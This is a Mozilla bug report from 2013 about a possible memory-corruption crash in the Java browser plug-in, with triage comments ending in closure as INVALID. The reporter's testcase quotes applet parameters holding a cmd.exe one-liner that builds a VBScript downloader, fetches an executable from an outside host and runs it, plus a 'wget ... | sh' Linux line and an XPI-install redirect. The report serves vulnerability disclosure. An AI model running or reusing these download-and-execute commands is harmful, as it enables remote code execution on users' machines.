Closed
Bug 904053
Opened 11 years ago
Closed 8 years ago
WINDOWS possible memory corruption with INNERHTML and applet code when onmousemove
Categories
(Core Graveyard :: Plug-ins, defect)
Tracking
(Not tracked)
RESOLVED
INVALID
People
(Reporter: jordi.chancel, Unassigned)
Details
(4 keywords, Whiteboard: potentially exploitable java bug)
Crash Data
Attachments
(2 files, 4 obsolete files)
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release)
Build ID: 20130729175331
Steps to reproduce:
https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812
with this code sometime mozilla firefox don't crash but sometime mozilla firefox crash with evidence of memory corruption.
On a session test i have found a possible critical memory corruption on windows
when you do document.getElementById("jo").innerHTML = "<iframe src='http://127.0.0.1/Vulnerability%20Research/test%20remote%20xpi%20cover%20by%20persistant%20select/hack.html'></iframe><div ><font color=white>=</font></div>"; on onmousemove ( http://127.0.0.1/Vulnerability%20Research/test%20remote%20xpi%20cover%20by%20persistant%20select/hack.html lead on this code :
<applet width='1' height='1' code='Client.class' archive='Client.jar'>
<param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://www.alternativ-testing.fr/calc.exe %temp%\update.exe'>
<param name='windows2' value=''>
<param name='unix1' value="">
<param name='unix2' value="">
<param name='linux1' value="wget http://www.alternativ-testing.fr/calc.exe -O- | sh">
<param name='linux2' value="">
</applet>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firefox 0day</title>
</head>
<body>
<body bgcolor="black" text="black" link="blue" vlink="purple" alink="red">
<p> </p>
</body>
<script language="JavaScript">navigator.geolocation.getCurrentPosition(LocationOK, LocationKO); function LocationOK(position)
{
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
alert('Location: ' + latitude + ', ' + longitude);
}
function LocationKO()
{
alert('You\'re lost !');
}
</script>
</body>
</html>
<script>
document.location ='./hackcalc.xpi';
</script>
memory corruption is observed.
Actual results:
Mozilla Firefox crash
Expected results:
mozilla firefox lead to crash with evidence of memory corruption
Reporter | ||
Updated•11 years ago
|
Attachment #788926 -
Attachment is obsolete: true
Updated•11 years ago
|
Crash Signature: https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812
Reporter | ||
Comment 1•11 years ago
|
||
Reporter | ||
Comment 2•11 years ago
|
||
Reporter | ||
Comment 3•11 years ago
|
||
Attachment #788940 -
Attachment is obsolete: true
Comment 4•11 years ago
|
||
The stack in bp-30b0bd53-5ec5-45d5-9be5-5cfde2130812 looks like the crash
is in the Java plug-in (npjp2.dll).
-> Plug-ins for further triage
Reporter | ||
Comment 6•11 years ago
|
||
last version of java please test the testcase localy and close/open firefox for each test.
Flags: needinfo?(jordi.chancel)
Comment 7•11 years ago
|
||
Jordi, please write the exact version so that future readers of this bug
know which version was meant by "last version". Thanks
Reporter | ||
Comment 8•11 years ago
|
||
java(tm) plateform se 7 u25 10.25.2.17
Updated•11 years ago
|
Flags: sec-bounty?
Updated•11 years ago
|
Crash Signature: https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812 → [@ npjp2.dll@0xc2bc ]
Updated•11 years ago
|
Attachment #789013 -
Attachment mime type: application/octet-stream → video/mp4
Updated•11 years ago
|
Attachment #789018 -
Attachment mime type: application/octet-stream → application/java-archive
Reporter | ||
Comment 9•11 years ago
|
||
multiple crash lead to access violation read on address 0x00000004 but some crash like https://crash-stats.mozilla.com/report/index/a009099a-1fe5-4e07-94b3-365742130813 and https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812 lead to evidence of memory corruption
Reporter | ||
Comment 10•11 years ago
|
||
https://crash-stats.mozilla.com/report/index/a009099a-1fe5-4e07-94b3-365742130813
Crash Reason EXCEPTION_ACCESS_VIOLATION_READ
Crash Address 0x2f6d6f63
-----------
https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812
Crash Reason EXCEPTION_ACCESS_VIOLATION_EXEC
Crash Address 0x2ffdb71
Updated•11 years ago
|
Flags: needinfo?(mwobensmith)
Comment 11•11 years ago
|
||
The steps to reproduce this bug are unclear. Please create steps, in the order to be executed. Is this test run locally or from a web server? What file is to be opened first?
I ran the files myself - both from a web server and locally. When run from a web server, I see the Firefox doorhanger dialogs for geolocation and XPI install repeatedly, but no crash. When run locally, I see a dialog that says: "Windows cannot find 'C:\Users\myusername\AppData\Local\Temp\winconfig.vbs'. Make sure you typed the name correctly, and then try again."
In both cases, I see no crash. I'm using the latest JRE 7u25 on Win7 as well.
Flags: needinfo?(mwobensmith)
Comment 12•11 years ago
|
||
Jordi, Matt cannot reproduce this. Can you work with him to answer his questions? Thanks.
Flags: needinfo?(jordi.chancel)
Reporter | ||
Comment 13•11 years ago
|
||
Go to 1.html and move the mouse on this page , if firefox don't crash this time please close firefox and open it and retry all step (move the move on 1.html).
I repeat this testcase work only for windows.
Attachment #789013 -
Attachment is obsolete: true
Attachment #789018 -
Attachment is obsolete: true
Flags: needinfo?(jordi.chancel)
Reporter | ||
Comment 14•11 years ago
|
||
1.html should be open localy for test the cash but firefox can crashed remotely most rarely.
Reporter | ||
Comment 15•11 years ago
|
||
Comment 16•11 years ago
|
||
Jordi, what exact version of Windows 7 are you running? Go to command line, type "ver" and tell me what that says.
Comment 17•11 years ago
|
||
The crash itself seems to be pretty common with Java, see https://crash-stats.mozilla.com/report/list?signature=npjp2.dll%400xc2bc
Comment 18•11 years ago
|
||
I'm going to confirm that there does appear to be a real Java bug here based on the crash-stats reports in comment 17, even if we're having trouble reproducing with this particular testcase. All the crashes, even the ones Jordi links to, appear to be x86 and not 64-bit despite the user agent in comment 0.
Would be interesting to try in Chrome, although there could be some browser/plugin interaction that's involved rather than a pure Java bug.
This is probably worth blocklisting Java 1.7 u25 over. I know we're going to blocklist it in Fx26 anyway, but we could do it now based on this.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(benjamin)
Keywords: sec-vector
Hardware: x86_64 → x86
Whiteboard: potentially exploitable java bug
Comment 19•11 years ago
|
||
Has anyone filed this with Oracle? We're blocking Java in bug 914690 (Fx24+) and I don't think this bug changes that calculation at all.
Flags: needinfo?(benjamin)
Reporter | ||
Comment 20•11 years ago
|
||
don't crash on google chrome.
Comment 21•11 years ago
|
||
this is a java bug so not eligible for our bounty.
Flags: sec-bounty? → sec-bounty-
Updated•9 years ago
|
Group: core-security → dom-core-security
Comment 23•8 years ago
|
||
I'm going to close this in our bug tracker, but leave it private since I don't see confirmation that this was ever reported to Oracle.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
Updated•5 years ago
|
Group: dom-core-security
Updated•2 years ago
|
Product: Core → Core Graveyard
Updated•4 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•